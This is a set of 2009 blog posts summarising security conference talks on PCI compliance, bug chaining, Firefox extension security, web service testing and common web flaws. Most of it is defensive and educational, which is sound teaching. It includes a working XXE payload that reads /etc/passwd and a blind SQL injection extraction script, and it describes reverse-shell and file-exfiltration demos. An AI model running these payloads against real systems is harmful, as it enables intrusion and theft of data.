Monday, July 13, 2009

If you store, transmit or process credit card data, PCI applies.

How can OWASP help you with PCI compliance?

Credit card data:

  • Primary Account Number (PAN): can be stored, but protection is required.
  • The CVD (3-digit card verification number) and magnetic stripe data can never be stored.

Card data attacks have been increasing in sophistication.

PCI-DSS affects anyone who transmits, processes or stores payment card data, e.g. merchants and service providers (such as Paymark and DPS).

Look at the 12 requirements of PCI-DSS (firewalls, storage, etc.).

Protecting stored data:

You must not store sensitive authentication data. Principle: if you don't need it, don't store it. Consider outsourcing, truncation, tokenisation.

Tokenisation: replace the PAN with a unique identifier, a "token".

Truncation: don't store all of the data (e.g. keep only the first 4 and last 4 digits).

Encryption: encrypt at the point of capture, only decrypt when required, use industry-standard encryption, and protect your keys.
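Not from the talk, but a minimal sketch of truncation and tokenisation as described above (in Python; the token_vault and function names are made up for illustration):

```python
import secrets

# Hypothetical in-memory token vault; a real one would be a hardened, access-controlled store.
token_vault = {}

def truncate_pan(pan: str) -> str:
    """Keep only the first 4 and last 4 digits, as suggested in the talk."""
    return pan[:4] + "*" * (len(pan) - 8) + pan[-4:]

def tokenise_pan(pan: str) -> str:
    """Replace the PAN with a random token; the mapping lives only in the vault."""
    token = secrets.token_hex(16)
    token_vault[token] = pan  # in practice the stored PAN would itself be encrypted
    return token

if __name__ == "__main__":
    pan = "4111111111111111"
    print(truncate_pan(pan))   # 4111********1111
    print(tokenise_pan(pan))   # a random token that is safe to store with the order record
```

The idea in both cases is the same: the application's own records never hold the full PAN.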

Developing secure applications / testing that the app was built securely / using secure coding guidelines:

Standard OWASP guidelines

Annual risk assessment:

Every year, new threats will affect your site. Go and re-assess it against the new threats.

 

Fixing legacy systems: make sure no old data is lying around.

Real-life example: it's very easy to mess up (an example was shown of accidentally reverting to old code).

Parting thoughts: achieve, maintain and validate compliance. Secure development is a key activity. OWASP is a good source. Reduce storage of PAN data.

posted on Monday, July 13, 2009 3:46:55 PM (New Zealand Standard Time, UTC+12:00)

Bug chaining - an idea that hasn't really propagated yet.

How do we rate how severe a bug is? Consider how easy it is to exploit and how it is exposed (client-side or server-side, internet-facing or local, mass-exploitable or requiring a targeted exploit, etc.).

Audience attempted to rate the severity of a couple of bugs:

  • SQL injection on authenticated site -> medium/high
  • File upload php files on authenticated site -> high/critical
  • Local file disclosure -> medium/high
  • XSS - reflective, authenticated -> low/medium

Is the attacker considered 'authenticated' once an XSS attack succeeds? If so, any subsequent attacks can be treated as authenticated.

When you join the XSS bug together with the file upload bug, it becomes critical!

Bug chaining: taking multiple bugs and chaining them together to create exploitable vulnerabilities. Instead of looking at each individual bug, look at how they can be combined together.

There are now frameworks to help chain together exploits - and this is how a lot of worms now work.

Recent examples of chained exploits: phpMyAdmin <= 3.1.3 and SugarCRM <= 5.2.0e - the server was compromised through 3 bugs used together.

How to deal with this? CVSSv2:

  • Common Vulnerability Scoring System v2.0
  • Scoring system for assessing bugs
  • Considers exploit complexity, application location, authentication, target likelihood, etc.
  • Can be very complex, time-consuming and difficult to follow (a small scoring sketch follows)
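Not part of the talk, but to make those bullets concrete, here is a rough sketch of the CVSS v2.0 base score equations (metric weights as published in the v2 spec; the example vector is my own choice):

```python
# Rough sketch of the CVSS v2.0 base score equations (metric weights from the v2 spec).
AV = {"L": 0.395, "A": 0.646, "N": 1.0}        # Access Vector
AC = {"H": 0.35, "M": 0.61, "L": 0.71}         # Access Complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}        # Authentication
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}       # Confidentiality/Integrity/Availability impact

def cvss2_base(av, ac, au, c, i, a):
    impact = 10.41 * (1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a]))
    exploitability = 20 * AV[av] * AC[ac] * AU[au]
    f = 0 if impact == 0 else 1.176
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f, 1)

# Example: SQL injection on an authenticated site (AV:N/AC:L/Au:S/C:P/I:P/A:P)
print(cvss2_base("N", "L", "S", "P", "P", "P"))  # 6.5 - in the same medium/high ballpark the audience gave it
```

A single number like this is exactly what bug chaining undermines - two 'medium' scores can combine into something critical.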

"You can explain this stuff all day, but when network admins actually see you do it, that's when they understand" Brett Moore

VtigerCRM - a large open-source CRM system which fixed the problems with a security patch, but doesn't link to the fix (and hasn't installed it themselves!).

He wrote a BeEF module for VtigerCRM that can run as an auto-run module (it took less than 2 hours to write):

  • Chains the file upload and XSS bugs to upload a malicious PHP script that starts a command shell
  • The connection is from the server to the attacker's machine, so the user doesn't need to stay connected

Summary:

Don't just look at the severity of individual bugs - you need to look at how bugs can be joined together.

Understand the bugs.

Follow the OWASP coding and testing guidelines.

Tools:

  • BeEF - a command console for an attacker to run script on the client computer. It has a modular list of exploits and can control multiple victims. Autorun modules execute automatically within 1.5-2 seconds.
posted on Monday, July 13, 2009 2:57:28 PM (New Zealand Standard Time, UTC+12:00)

Firefox extensions: they're just software, like ActiveX. They can extend, modify and control the browser.

Firefox extension points:

  • XUL: XML user interface language
  • XBL: XML Binding Language - logical behaviour of widgets
  • XPCOM: Reusable components, interface to file system etc.
  • XPConnect: Allows Javascript to connect to XPCOM
  • Chrome: Special browser zone that is fully trusted by Firefox - code there is fully trusted and has access to the filesystem, user passwords, etc.

Mozilla's extension security model is non-existent. All extensions are fully trusted by Firefox - there are no boundaries between extensions, and they can modify each other without the user knowing. Extensions can be coded in C++ and so are subject to memory corruption, etc.

Extensions are very popular (a billion downloads) and can be found everywhere - social networks, search engines, software packages (Skype, anti-virus), anti-phishing toolbars.

The biggest problem is the human side of things - addons.mozilla.org recommends extensions and adds a 'recommended' icon next to them, but extension source code isn't read by third parties ("It's not the Linux kernel").

There's no protection from an extension with a security problem; it will bypass any other phishing/malware protection extensions.

Extensions aren't signed (even the Mozilla ones), so we can't rely on people checking signatures.

If an extension is originally trusted, then subsequent updates won't go through the same review process.

There are no current guidelines for testing a Firefox extension, so security-assessment.com have come up with their own methodology (whitepaper to be released later this year or early next year):

  • Isolated testing: Only test one extension at a time, on different OSes with different Firefox versions.
  • Information gathering: How does the extension work, how is it installed? Look inside the extension package (a zip file) for malicious files (e.g. .exe, .msi, etc.) - see the sketch after this list.
  • Look for XPInstall API functions that are dangerous (e.g. executing code on install)
  • Look for suspicious files in the extension folder (e.g. softlinks to other directories)
  • Look inside install.rdf - some tags can hide extensions so they don't appear in the addon manager
  • Extensions can have the same description as other installed extensions, so two appear in addon manager
  • Does the extension try to trick the user into thinking it's verified?
  • Look for pointers outside the extension, or flags that expose the extension object or content to untrusted code (e.g. contentaccessible=yes or xpcnativewrappers=no)
  • Extensions can be merged into the Firefox UI - e.g. the top toolbar or bottom status bar. They can also modify existing buttons, e.g. the Reload, Back, Forward or Home buttons.
  • Use the extension. Check the DOM of a test page with the extension loaded (they used MozRepl to do this)
  • Debugging: can set breakpoints using Javascript debugger.
  • Sandbox: can be sidestepped by replacing code inside the sandbox or evaluating it from outside
  • XPCOM components: .dll or .so - compiled code that the extension may ship with, or may use existing components on the machine. May need to review source code or decompile. A bunch of components to watch out for.
  • wrappedJSObject: removes the wrapper protection around an XPCOM/content object, so code using it is sidestepping Firefox's protection.
  • Watch out for callback functions, which may be replaced / modified
  • window.openDialog: opens any URI with elevated chrome privileges
  • Auth: Some expose credentials in plain text, e.g. GET or basic auth
  • Auth: Some expose functionality via javascript that can side-step normal process
  • Skype extension - a JavaScript call that any web page can use to make your Skype start dialling any number
  • XSS: Watch out for XSS issues - can execute in the chrome zone from DOM events, embedded XSS, recursive iframes
  • XSS: Extensions loading external scripts
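A possible first-pass script for the information-gathering steps above (my own sketch, not the security-assessment.com tooling; the file name and flag patterns are illustrative only):

```python
import re
import zipfile

SUSPICIOUS_EXT = (".exe", ".msi", ".dll", ".so")
RISKY_FLAGS = re.compile(r"contentaccessible\s*=\s*yes|xpcnativewrappers\s*=\s*no|<em:hidden", re.I)

def inspect_xpi(path):
    """Quick first pass over an extension package before deeper manual review."""
    with zipfile.ZipFile(path) as xpi:
        for name in xpi.namelist():
            if name.lower().endswith(SUSPICIOUS_EXT):
                print("suspicious file shipped in package:", name)
            if name.endswith(("chrome.manifest", "install.rdf")):
                text = xpi.read(name).decode("utf-8", errors="replace")
                for line in text.splitlines():
                    if RISKY_FLAGS.search(line):
                        print(f"risky flag in {name}: {line.strip()}")

inspect_xpi("someextension.xpi")  # hypothetical package name
```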

They have applied their methodology to different extensions, and some vendor responses have been slow or non-existent!

Here are some extensions that were demoed and had problems. They are all common or Mozilla-recommended (all of these have since been fixed):

  • FireFTP: Malicious code could be included in the welcome message of an FTP server, and the browser would execute it. Showed a proof of concept sending the contents of win.ini to a different server, and using BeEF to control the client.
  • CoolPreviews: Susceptible to XSS if a data: URI is used. Showed remote code execution when right-clicking on a link and previewing it with CoolPreviews.
  • WizzRSS: HTML and JavaScript in the <description> tag of RSS feeds are executed in the chrome zone. Showed a reverse shell onto the Windows machine from a malicious user's machine.

Extension developers and vendors don't have a security disclosure process yet - they don't know how to deal with these issues. Some extensions don't even publish an email address for the author.

Tools:

  • Firebug
  • MozRepl
  • BeEF - command console for an attacker to run script on the client computer.
posted on Monday, July 13, 2009 2:19:53 PM (New Zealand Standard Time, UTC+12:00)

With the shift to web services, where we are relying on the client to secure things, we have to remember not to trust the client.

Gave a methodology for testing web services:

  • Service discovery:
    • Look for WSDL or similar files that contain service info, using search engines, site spidering or looking at app behaviour
  • Method discovery:
    • Look inside the WSDL to see what methods are available; if there isn't one, you can brute-force the web service with common method names to find ones that exist.
  • OWASP top 10. These still all apply to web service calls, including:
    • Malicious file execution, insecure direct object reference,
    • CSRF with AJAX clients
    • Information leakage
    • Broken auth and session mgmt
    • Insecure crypto storage
    • Insecure communications - SSL is important
    • Failure to restrict URL access - protect admin etc web services from anonymous access
  • Web service specific tests:
    • XML issues (external entities, malformed XML, recursive XML, XML entity expansion, XML attribute blowup, overlarge XML and CDATA injection)
      • External entities can be used to find out details from inside the secure network, and to CSRF machines in there (a small sketch follows this list).
    • WS-Routing issues
  • WS-Security is not a panacea - it secures message integrity and confidentiality, but doesn't stop bad content coming through.
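For the external entity issue in the XML bullet above, this is roughly what a payload looks like (a hedged sketch - the endpoint URL and element names are invented):

```python
import requests  # assumes the requests library is available

# Classic external entity payload: if the service's XML parser resolves external
# entities, the contents of a server-side file come back in the response.
xxe_payload = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
  <customerName>&xxe;</customerName>
</order>"""

resp = requests.post("https://example.com/ws/orders",        # hypothetical endpoint
                     data=xxe_payload,
                     headers={"Content-Type": "text/xml"})
print(resp.text)  # look for the file contents echoed back in the response or fault
```

Pointing the SYSTEM entity at internal URLs instead of files is what lets an attacker learn about machines inside the secure network.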

Tools shown:

posted on Monday, July 13, 2009 11:47:27 AM (New Zealand Standard Time, UTC+12:00)

If you don't own the 3 OWASP books, you've failed.

We're still facing the same vulnerabilities we've always had, because we are doing something wrong. Maybe it's security professionals who are doing something wrong, by not educating developers properly.

Big security companies are still having problems with their websites.

Most vulnerabilities are well known.

Security people don't write code; developers do. And developers don't "get" security:

  • Don't fix the root cause
  • Don't understand the threat
  • Most have never seen a vulnerability exploited

Sitting down with developers and stepping them through a vulnerability helps show them the light - they start to understand and think about vulnerabilities.

Today's talk was designed to show developers exploits in action.

Tools shown:

  • Burp - proxy tool for intercepting requests
  • A custom sitemap tool that Insomnia uses
  • An MS-SQL enumeration tool that takes a vulnerable URL and pulls out all the DB info, using the master DB to enumerate tables
  • ASPX Spy - if you can get this ASP.NET file onto a server and run it, it provides a UI for playing around with the OS.
  • SQL Map - an automatic SQL injection tool that can enumerate the DB even if the data is not displayed, by inferring the state of the DB from the page output (a minimal inference sketch follows this list).
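A minimal sketch of the inference idea behind that last bullet (this is not SQL Map itself; the URL, parameter and marker text are hypothetical):

```python
import requests
import string

TRUE_MARKER = "In stock"   # text that only appears when the page renders normally

def condition_is_true(sql_condition):
    """Boolean-based blind test: inject 'AND <condition>' and see if the page still renders."""
    resp = requests.get("https://example.com/product",            # hypothetical vulnerable page
                        params={"id": "1 AND " + sql_condition})
    return TRUE_MARKER in resp.text

def extract_db_name(max_len=20):
    """Recover the database name one character at a time via yes/no questions."""
    name = ""
    for pos in range(1, max_len + 1):
        for ch in string.ascii_lowercase + string.digits + "_":
            if condition_is_true(f"SUBSTRING(DB_NAME(),{pos},1)='{ch}'"):
                name += ch
                break
        else:
            break  # no character matched - we've reached the end of the name
    return name

print(extract_db_name())
```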

Problems shown:

  • Robots.txt is not a place to list parts of your site that you don't want people to know about :)
  • Buying a quantity of -1 of a $1000 book leads to the user's credit on the shopping site increasing by $1000 :) (a server-side validation sketch follows this list)
  • XML parsing vulnerability that allows external entities to be referenced in the XML provided to a web service - which can pull the contents of a file off the server.
  • Query string parameters passed to the command interpreter, and used for file names.
  • PHP include lets you include PHP source from another web server (it looks like you need to disable URL fopen wrappers).
  • Only securing GET requests to an admin directory.
  • Showed a fake version of the CCIP website with multiple problems.
  • Admin interface for a website is exposed to the internet.
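For the -1 quantity bug in the list above, the missing server-side check is small; a sketch (the cart structure is hypothetical, and the demo site was not necessarily written in Python):

```python
# The bug: trusting the client-supplied quantity, so qty = -1 turns a charge into a credit.
def add_to_cart_insecure(cart, price, qty):
    cart["total"] += price * qty          # qty = -1, price = 1000 -> total drops by $1000

# The fix: validate on the server, whatever the client sent.
def add_to_cart(cart, price, qty):
    if not isinstance(qty, int) or qty < 1:
        raise ValueError("quantity must be a positive whole number")
    cart["total"] += price * qty

cart = {"total": 0}
add_to_cart(cart, 1000, 2)       # fine
# add_to_cart(cart, 1000, -1)    # raises ValueError instead of crediting the account
```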

Open questions:

  • Who owns server configuration? Architects, developers, system administrators? If the server or framework config changes, then we're insecure.
  • Is it the security professional's job to make sure problems are corrected?
posted on Monday, July 13, 2009 10:37:46 AM (New Zealand Standard Time, UTC+12:00)

Paul raised the question: "Is internet security getting better or worse?"

By 2004 we had bought lots of security products, and port 80 was the only open port (default DENY). Hackers started hacking web apps instead.

Classic ASP was easy to hack, until 2005 when vendors started releasing safer technology frameworks (2005? We were using it in 2002).

Note: ASP.NET doesn't have XSS protection built in, unless you leave ValidateRequest on (which no-one does), as controls only sporadically escape their output.
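The general defence is the same in any stack: explicitly encode untrusted output rather than hoping the framework does it. A generic sketch (Python's html.escape, purely for illustration - not the ASP.NET API):

```python
import html

user_supplied = '<script>alert("xss")</script>'

# Relying on the framework to escape this "sporadically" is the trap described above.
unsafe_fragment = "<td>" + user_supplied + "</td>"

# Explicit output encoding at the point of rendering:
safe_fragment = "<td>" + html.escape(user_supplied) + "</td>"
print(safe_fragment)  # <td>&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</td>
```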

Paul looked at Security-Assessment's old pen-test projects and compared their vulnerabilities to those run recently.

"In 2003-2005, web application developers were F$%^&* bad"

"Developers fail at anything to do with files"

But the situation hasn't got much better lately. Admin sections are still accessible, SQL injection is still found (though less common), and file uploads still allow directory traversal.

When developers use framework security controls, they're okay. If they use custom security code, they mess it up.

"Less vulnerabilities in 2009 resulted in a shell"

"Security only works flawlessly when it's already implemented in the framework" - when developers build their own code, they normally mess it up.

Summary: The internet is getting more secure, but we're not there yet! It only takes one bug to get into a system.

posted on Monday, July 13, 2009 9:44:40 AM (New Zealand Standard Time, UTC+12:00)